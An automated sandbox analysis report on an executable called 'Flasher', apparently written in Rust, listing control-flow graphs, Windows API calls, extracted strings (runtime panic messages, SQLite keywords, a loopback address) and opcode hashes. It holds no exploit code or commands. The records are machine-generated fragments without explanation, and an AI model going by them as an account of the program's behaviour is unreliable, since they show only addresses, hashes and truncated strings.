                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$cannot access a Thread Local Storage value during or after destruction/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\thread\local.rs$ilureInvalidQueryMultipleStatementInvalidParameterCountSqlInputErrorsql
                                                                      • API String ID: 695158741-1197944294
                                                                      • Opcode ID: 317065f3309f3bc7692c3311ea68b684aed2e2d83edcbcc849f8b0023c71ae39
                                                                      • Instruction ID: 607b712df9843ca5473ee42ee7cfcfda96063e497c8e86d22ef6f3745037c14b
                                                                      • Opcode Fuzzy Hash: 317065f3309f3bc7692c3311ea68b684aed2e2d83edcbcc849f8b0023c71ae39
                                                                      • Instruction Fuzzy Hash: 44025836609F86C5E7248F24E8817ED73A4FB49B88F404136DA9DABB95DF39D265C300

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 17625 7ff6d35fac61-7ff6d35facaa call 7ff6d35f4f77 17628 7ff6d35facce-7ff6d35facd9 17625->17628 17629 7ff6d35facac-7ff6d35facb1 17625->17629 17632 7ff6d35facec-7ff6d35fad2a 17628->17632 17633 7ff6d35facdb-7ff6d35face8 call 7ff6d35f9d9e 17628->17633 17630 7ff6d35fb2fb-7ff6d35fb30e call 7ff6d3734750 17629->17630 17631 7ff6d35facb7-7ff6d35facc9 17629->17631 17641 7ff6d35fb313-7ff6d35fb349 call 7ff6d3734a10 17630->17641 17643 7ff6d35fad66-7ff6d35fad89 call 7ff6d35c598d 17631->17643 17636 7ff6d35fad54-7ff6d35fad62 17632->17636 17637 7ff6d35fad2c-7ff6d35fad52 WakeByAddressSingle 17632->17637 17633->17632 17638 7ff6d35fad64 17636->17638 17639 7ff6d35fad8a-7ff6d35fad91 17636->17639 17637->17638 17638->17643 17644 7ff6d35fb35a-7ff6d35fb36d call 7ff6d3734750 17639->17644 17645 7ff6d35fad97-7ff6d35fad9b 17639->17645 17649 7ff6d35fb3a1-7ff6d35fb3c4 17641->17649 17652 7ff6d35fb372-7ff6d35fb37c call 7ff6d373420a 17644->17652 17645->17649 17650 7ff6d35fada1-7ff6d35fadd6 17645->17650 17654 7ff6d35fb3d9-7ff6d35fb3ea 17649->17654 17655 7ff6d35fb3c6-7ff6d35fb3d3 HeapFree 17649->17655 17659 7ff6d35faddc-7ff6d35fadec 17650->17659 17660 7ff6d35fadd8 17650->17660 17658 7ff6d35fb381-7ff6d35fb385 call 7ff6d37382e0 17652->17658 17655->17654 17664 7ff6d35fb38a-7ff6d35fb39c call 7ff6d373420a 17658->17664 17662 7ff6d35fadee-7ff6d35fae03 17659->17662 17663 7ff6d35fae0a-7ff6d35fae16 17659->17663 17660->17659 17665 7ff6d35fae05 17662->17665 17666 7ff6d35fae24-7ff6d35fae26 17662->17666 17663->17649 17667 7ff6d35fae1c 17663->17667 17664->17649 17665->17649 17668 7ff6d35faee2 17666->17668 17669 7ff6d35fae2c-7ff6d35fae36 17666->17669 17667->17666 17673 7ff6d35faee9-7ff6d35faeed 17668->17673 17671 7ff6d35fae40-7ff6d35fae65 call 7ff6d35d9ae0 17669->17671 17672 7ff6d35fae38-7ff6d35fae3b 17669->17672 17680 7ff6d35fae6f-7ff6d35fae8b call 7ff6d353c060 17671->17680 17681 7ff6d35fae67-7ff6d35fae6d 17671->17681 17672->17668 17675 7ff6d35faef3-7ff6d35faf00 17673->17675 17676 7ff6d35fb2f6 call 7ff6d3737e70 17673->17676 17675->17673 17678 7ff6d35faf02-7ff6d35faf0c 17675->17678 17676->17630 17682 7ff6d35faf0e-7ff6d35faf23 call 7ff6d35efed0 17678->17682 17683 7ff6d35faf48-7ff6d35faf4c 17678->17683 17698 7ff6d35fae95-7ff6d35faeaf call 7ff6d3542660 17680->17698 17699 7ff6d35fae8d-7ff6d35fae93 17680->17699 17684 7ff6d35faed3-7ff6d35faede 17681->17684 17696 7ff6d35fb34b-7ff6d35fb355 call 7ff6d373420a 17682->17696 17697 7ff6d35faf29-7ff6d35faf43 17682->17697 17687 7ff6d35faf4e-7ff6d35faf51 17683->17687 17688 7ff6d35faf6b-7ff6d35faf7b call 7ff6d353fed0 17683->17688 17684->17668 17692 7ff6d35faf53 17687->17692 17693 7ff6d35faf81-7ff6d35fafaf call 7ff6d3531630 call 7ff6d35efed0 17687->17693 17688->17641 17688->17693 17700 7ff6d35faf55-7ff6d35faf5b 17692->17700 17693->17664 17715 7ff6d35fafb5-7ff6d35fafd0 17693->17715 17696->17644 17702 7ff6d35fafd5-7ff6d35fafe5 17697->17702 17703 7ff6d35faeb5-7ff6d35faeb8 17698->17703 17714 7ff6d35faeb1 17698->17714 17699->17703 17700->17641 17705 7ff6d35faf61-7ff6d35faf67 17700->17705 17702->17649 17708 7ff6d35fafeb-7ff6d35fb000 call 7ff6d35efed0 17702->17708 17703->17684 17711 7ff6d35faeba-7ff6d35faed0 HeapFree 17703->17711 17705->17700 17710 7ff6d35faf69 17705->17710 17708->17652 17717 7ff6d35fb006-7ff6d35fb027 17708->17717 17710->17693 17711->17684 17714->17703 17715->17702 17717->17649 17718 7ff6d35fb02d-7ff6d35fb03a call 7ff6d35e0880 17717->17718 17721 7ff6d35fb04c 17718->17721 17722 7ff6d35fb03c-7ff6d35fb041 17718->17722 17724 7ff6d35fb04e-7ff6d35fb056 call 7ff6d35e0880 17721->17724 17722->17649 17723 7ff6d35fb047-7ff6d35fb04a 17722->17723 17723->17724 17727 7ff6d35fb058-7ff6d35fb05c 17724->17727 17728 7ff6d35fb066-7ff6d35fb071 17724->17728 17727->17728 17729 7ff6d35fb05e-7ff6d35fb061 call 7ff6d35f8c23 17727->17729 17730 7ff6d35fb073-7ff6d35fb078 17728->17730 17731 7ff6d35fb07e-7ff6d35fb093 call 7ff6d35efed0 17728->17731 17729->17728 17730->17658 17730->17731 17731->17696 17735 7ff6d35fb099-7ff6d35fb0d1 call 7ff6d35ec9b0 17731->17735 17737 7ff6d35fb0d6-7ff6d35fb0dc 17735->17737 17738 7ff6d35fb0de-7ff6d35fb0e2 17737->17738 17739 7ff6d35fb13d-7ff6d35fb173 call 7ff6d35f5fb5 17737->17739 17740 7ff6d35fb0e4-7ff6d35fb0e7 call 7ff6d35f4763 17738->17740 17741 7ff6d35fb0ec-7ff6d35fb0f1 17738->17741 17747 7ff6d35fb2e2-7ff6d35fb2f1 call 7ff6d3739678 17739->17747 17748 7ff6d35fb179-7ff6d35fb1a9 17739->17748 17740->17741 17745 7ff6d35fb0f3-7ff6d35fb0f6 call 7ff6d35f470b 17741->17745 17746 7ff6d35fb0fb-7ff6d35fb116 call 7ff6d355332e 17741->17746 17745->17746 17757 7ff6d35fb11c-7ff6d35fb129 17746->17757 17758 7ff6d35fb278-7ff6d35fb27b 17746->17758 17747->17676 17751 7ff6d35fb1ac-7ff6d35fb1c0 17748->17751 17754 7ff6d35fb1c2-7ff6d35fb1dd 17751->17754 17755 7ff6d35fb1ef-7ff6d35fb1f9 17751->17755 17759 7ff6d35fb230-7ff6d35fb265 17754->17759 17760 7ff6d35fb1df-7ff6d35fb1ed 17754->17760 17761 7ff6d35fb211-7ff6d35fb21b 17755->17761 17762 7ff6d35fb1fb-7ff6d35fb20e 17755->17762 17757->17643 17763 7ff6d35fb12f-7ff6d35fb138 call 7ff6d35f5117 17757->17763 17758->17643 17759->17638 17766 7ff6d35fb26b-7ff6d35fb273 call 7ff6d35f4603 17759->17766 17760->17754 17760->17755 17764 7ff6d35fb280-7ff6d35fb287 17761->17764 17765 7ff6d35fb21d-7ff6d35fb22b 17761->17765 17762->17761 17763->17638 17770 7ff6d35fb289-7ff6d35fb294 17764->17770 17771 7ff6d35fb298-7ff6d35fb2da 17764->17771 17765->17751 17766->17638 17770->17771 17771->17747
                                                                      APIs
                                                                      Strings
                                                                      • assertion failed: prev.ref_count() >= 1, xrefs: 00007FF6D35FB2FB
                                                                      • thread name may not contain interior null bytes, xrefs: 00007FF6D35FB331
                                                                      • assertion failed: shared.shutdown_tx.is_some()C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.27.0\src\runtime\blocking\pool.rs, xrefs: 00007FF6D35FB35A
                                                                      • RUST_MIN_STACK(), xrefs: 00007FF6D35FAE44
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$AddressSingleWakememmove
                                                                      • String ID: RUST_MIN_STACK()$assertion failed: prev.ref_count() >= 1$assertion failed: shared.shutdown_tx.is_some()C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.27.0\src\runtime\blocking\pool.rs$thread name may not contain interior null bytes
                                                                      • API String ID: 88297428-1933385349
                                                                      • Opcode ID: c2913b891a439f001e4ec644ef78c6405b13956385a80b290e67a12fbfb9e135
                                                                      • Instruction ID: 67f46848c7efc446e7b4ca2ac1b06962d9b47a45c339637119adeafca5b638be
                                                                      • Opcode Fuzzy Hash: c2913b891a439f001e4ec644ef78c6405b13956385a80b290e67a12fbfb9e135
                                                                      • Instruction Fuzzy Hash: 3B22F562A09B8581EB519B61E8023BDB7A4FB85B94F054637DF5EA7785DF3DE0A0C300

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 17861 7ff6d35d5c30-7ff6d35d5c87 NtWriteFile 17862 7ff6d35d5ca1-7ff6d35d5ca3 17861->17862 17863 7ff6d35d5c89-7ff6d35d5c9f WaitForSingleObject 17861->17863 17864 7ff6d35d5ca5-7ff6d35d5cab 17862->17864 17865 7ff6d35d5cad-7ff6d35d5cbf RtlNtStatusToDosError 17862->17865 17863->17862 17866 7ff6d35d5cce-7ff6d35d5d4b call 7ff6d35d4fc0 call 7ff6d35d51b0 call 7ff6d3732780 17863->17866 17867 7ff6d35d5cc4-7ff6d35d5ccd 17864->17867 17865->17867 17874 7ff6d35d5d4d-7ff6d35d5d52 17866->17874 17875 7ff6d35d5d88-7ff6d35d5dae MultiByteToWideChar 17866->17875 17878 7ff6d35d5d60-7ff6d35d5d6b 17874->17878 17876 7ff6d35d5db4-7ff6d35d5dbc 17875->17876 17877 7ff6d35d5ef9-7ff6d35d5f35 call 7ff6d37346b0 17875->17877 17879 7ff6d35d5dc2-7ff6d35d5dee WriteConsoleW 17876->17879 17880 7ff6d35d5f3a-7ff6d35d5f49 call 7ff6d37346e0 17876->17880 17877->17880 17878->17878 17882 7ff6d35d5d6d-7ff6d35d5d70 17878->17882 17883 7ff6d35d5df4-7ff6d35d5dfd 17879->17883 17884 7ff6d35d5ece-7ff6d35d5ee2 GetLastError 17879->17884 17889 7ff6d35d5f4e-7ff6d35d5f63 call 7ff6d3734ca0 17880->17889 17886 7ff6d35d5d82 17882->17886 17887 7ff6d35d5d72-7ff6d35d5d77 17882->17887 17890 7ff6d35d5e03 17883->17890 17891 7ff6d35d5ee6 17883->17891 17888 7ff6d35d5ee8-7ff6d35d5ef8 17884->17888 17886->17875 17886->17889 17887->17889 17892 7ff6d35d5d7d-7ff6d35d5d80 17887->17892 17893 7ff6d35d5f68-7ff6d35d5f75 call 7ff6d373463f 17889->17893 17890->17893 17894 7ff6d35d5e09-7ff6d35d5e1b 17890->17894 17891->17888 17892->17875 17900 7ff6d35d5f7a-7ff6d35d5f9c call 7ff6d37346e0 17893->17900 17896 7ff6d35d5e5d-7ff6d35d5e60 17894->17896 17897 7ff6d35d5e1d-7ff6d35d5e56 WriteConsoleW 17894->17897 17896->17900 17901 7ff6d35d5e66-7ff6d35d5e69 17896->17901 17897->17896 17899 7ff6d35d5e58 GetLastError 17897->17899 17899->17896 17909 7ff6d35d5f9e-7ff6d35d5fa0 17900->17909 17910 7ff6d35d5fa8-7ff6d35d5fa9 17900->17910 17902 7ff6d35d5ee4 17901->17902 17903 7ff6d35d5e6b-7ff6d35d5e72 17901->17903 17902->17891 17905 7ff6d35d5e8c-7ff6d35d5e9c 17903->17905 17907 7ff6d35d5e9e-7ff6d35d5eae 17905->17907 17908 7ff6d35d5e80-7ff6d35d5e8a 17905->17908 17907->17908 17911 7ff6d35d5eb0-7ff6d35d5ecc 17907->17911 17908->17891 17908->17905 17912 7ff6d35d5fa2 17909->17912 17913 7ff6d35d5faf-7ff6d35d5fb0 17909->17913 17910->17913 17911->17908 17912->17910
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Write$ConsoleError$ByteCharFileLastMultiObjectSingleStatusWaitWide
                                                                      • String ID:
                                                                      • API String ID: 3155872604-0
                                                                      • Opcode ID: b70021959a8d49e3710f0c45d9b15a7d07c7693806351d7163ba7a343326666a
                                                                      • Instruction ID: a9403678b21acd096a3077531c54d36888f81ba701dd37dfd1d3b24197f24e62
                                                                      • Opcode Fuzzy Hash: b70021959a8d49e3710f0c45d9b15a7d07c7693806351d7163ba7a343326666a
                                                                      • Instruction Fuzzy Hash: 52911632E08A9689F7609B60E8463FDA351FB84794F444532E94EE7BD8EF7CD1A58304
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BINARY$MATCH$NOCASE$RTRIM$main$temp
                                                                      • API String ID: 0-1145213229
                                                                      • Opcode ID: a564deada8be6c8bf1c27d46a6061b6102663dc72d368952f28415a0ae8ec3a0
                                                                      • Instruction ID: d1b42ee3bbfef9a3d742e894d576691ed9978ebd95a735057547c0a1de87547e
                                                                      • Opcode Fuzzy Hash: a564deada8be6c8bf1c27d46a6061b6102663dc72d368952f28415a0ae8ec3a0
                                                                      • Instruction Fuzzy Hash: 94F1A162A08BC285FB609F26A85227DABA5FF45B84F444137DA4DE7395DF3CE421E304
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseFind$FileFirstFreeHandleHeapmemset
                                                                      • String ID:
                                                                      • API String ID: 1768811725-0
                                                                      • Opcode ID: 8bf0855bdfe87e0e73fa9109cd073f07444acfbc9c5f6b55676b1235ee4701f7
                                                                      • Instruction ID: 0a5086fc3d1d4d1ba50f666ba595ca9029a611610b6b60855dca67ff8c7675e1
                                                                      • Opcode Fuzzy Hash: 8bf0855bdfe87e0e73fa9109cd073f07444acfbc9c5f6b55676b1235ee4701f7
                                                                      • Instruction Fuzzy Hash: A4517537A04B8585E7748F61F8453ADB3A1FB45798F104226DE6D9BB98DF3C9195C300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileObjectReadSingleStatusWait
                                                                      • String ID:
                                                                      • API String ID: 3583596364-3916222277
                                                                      • Opcode ID: 70bbf5f65f15521e0d3843ac71961e27590b032ae2c85b0bda538562b7446595
                                                                      • Instruction ID: cd8cc15ee92ce833891fc09c1de226d9b23cf96049380d9b0adc4ef058f3299e
                                                                      • Opcode Fuzzy Hash: 70bbf5f65f15521e0d3843ac71961e27590b032ae2c85b0bda538562b7446595
                                                                      • Instruction Fuzzy Hash: 1D21C822F14A558AF750CB70E8423AD63A1EB98358F548532E98DE7B98EF3CD5E58340
                                                                      APIs
                                                                      • HeapFree.KERNEL32(?,00000000,?,-8000000000000000,?,?,?,?,00007FF6D355181A), ref: 00007FF6D3550C27
                                                                      • HeapFree.KERNEL32(?,00000000,?,-8000000000000000,?,?,?,?,00007FF6D355181A), ref: 00007FF6D3550C76
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: header map at capacity$requested capacity too large
                                                                      • API String ID: 3298025750-1945430686
                                                                      • Opcode ID: cbaefdbfe7de191d29f4a13b2babd8b6420e423f3e7f25d2920b63507607956a
                                                                      • Instruction ID: 68dbdbcbc8891be77b67cd771fcbeb53fdf11d5be9e3bc3e6131df0ef7682183
                                                                      • Opcode Fuzzy Hash: cbaefdbfe7de191d29f4a13b2babd8b6420e423f3e7f25d2920b63507607956a
                                                                      • Instruction Fuzzy Hash: C4C11962B15A5942EA658F16A80277DA361FF45BD4F049232DE4EA7794EF3CF4A1C300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ControlDeviceErrorFileFreeHeapStatus
                                                                      • String ID: called `Result::unwrap()` on an `Err` value
                                                                      • API String ID: 1661082384-2333694755
                                                                      • Opcode ID: f2c61478c6225c396e338b96875407f66e3448902ddb68572fba0718f547a96d
                                                                      • Instruction ID: c8f28dc740cba99ee83cf0bbfbe0aa2b18bdaebed85cc7a1925324d934364e8b
                                                                      • Opcode Fuzzy Hash: f2c61478c6225c396e338b96875407f66e3448902ddb68572fba0718f547a96d
                                                                      • Instruction Fuzzy Hash: A202F1B2E19B8A82EA508F15E84667EA7A0FB45B84F558033DE9D937A4DE3CE055C700
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 127.0.0.1:34254
                                                                      • API String ID: 0-1314517743
                                                                      • Opcode ID: 310e91a4f1b053f00417cb1f169934d2a2c346be95e19224e15c4f066d43485b
                                                                      • Instruction ID: 18aecf36c3e19f59c1b91b98cbd717398528241ce490b44080d779ac306185c3
                                                                      • Opcode Fuzzy Hash: 310e91a4f1b053f00417cb1f169934d2a2c346be95e19224e15c4f066d43485b
                                                                      • Instruction Fuzzy Hash: DC210661B1D68A82F7A46B36E8077BDA6A0EFC4740F554033DA5CE2795DE3CE462C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memset$HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 3537884723-0
                                                                      • Opcode ID: 7e9ccf7b0d4d3f2a807f73d60cb1f6886053054470657c71001901ef77cadb26
                                                                      • Instruction ID: 1498b2dd52df8d7ebe15b8baa983dc5832d296ba3fffe2d2a152738d1f97ac45
                                                                      • Opcode Fuzzy Hash: 7e9ccf7b0d4d3f2a807f73d60cb1f6886053054470657c71001901ef77cadb26
                                                                      • Instruction Fuzzy Hash: 9241E662B06A9502F75ED762A8127FD5283DBC8384F09C439DD8D977CADDBD94E28300
                                                                      Strings
                                                                      • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D35F892C
                                                                      • A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi, xrefs: 00007FF6D35F840D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: A Tokio 1.x context was found, but IO is disabled. Call `enable_io` on the runtime builder to enable IO.A Tokio 1.x context was found, but timers are disabled. Call `enable_time` on the runtime builder to enable timers.Oh no! We never placed the Core back, thi$called `Result::unwrap()` on an `Err` value
                                                                      • API String ID: 0-3163332627
                                                                      • Opcode ID: 6d5b52a3c15cc90fc6bf7c466058691ec5e30a09e2a5f0b33709e93b854540c1
                                                                      • Instruction ID: 6e13c88bc7684041a37bac504fb4a3f42b2fdf5a7bd45ffe6d1a3c2b5f581758
                                                                      • Opcode Fuzzy Hash: 6d5b52a3c15cc90fc6bf7c466058691ec5e30a09e2a5f0b33709e93b854540c1
                                                                      • Instruction Fuzzy Hash: B3F10422B09B4A82EB248F15E4023BEA3A1FB54788F544137DE5E97795DF3CE5A6C340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeString
                                                                      • String ID:
                                                                      • API String ID: 3341692771-0
                                                                      • Opcode ID: feeeb1ceea73fdf837f8e55b5c2e80a4c52be0fcebe39181f1ec126963adf065
                                                                      • Instruction ID: 9224c0d0474daec890065f879205632d08e908f2e99ac17e05e9e8b9b5a2a525
                                                                      • Opcode Fuzzy Hash: feeeb1ceea73fdf837f8e55b5c2e80a4c52be0fcebe39181f1ec126963adf065
                                                                      • Instruction Fuzzy Hash: 12415F32A19B8282E7248F16F45276EB760FB84784F148136EF9D93B55EF3DD0559700
                                                                      APIs
                                                                      • memset.VCRUNTIME140(?,?,?,?,00007FF6D371D78A,?,?,00000004,00007FF6D367A0CD), ref: 00007FF6D371D92D
                                                                      • GetSystemInfo.KERNELBASE(?,?,?,?,00007FF6D371D78A,?,?,00000004,00007FF6D367A0CD), ref: 00007FF6D371D939
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoSystemmemset
                                                                      • String ID:
                                                                      • API String ID: 3558857096-0
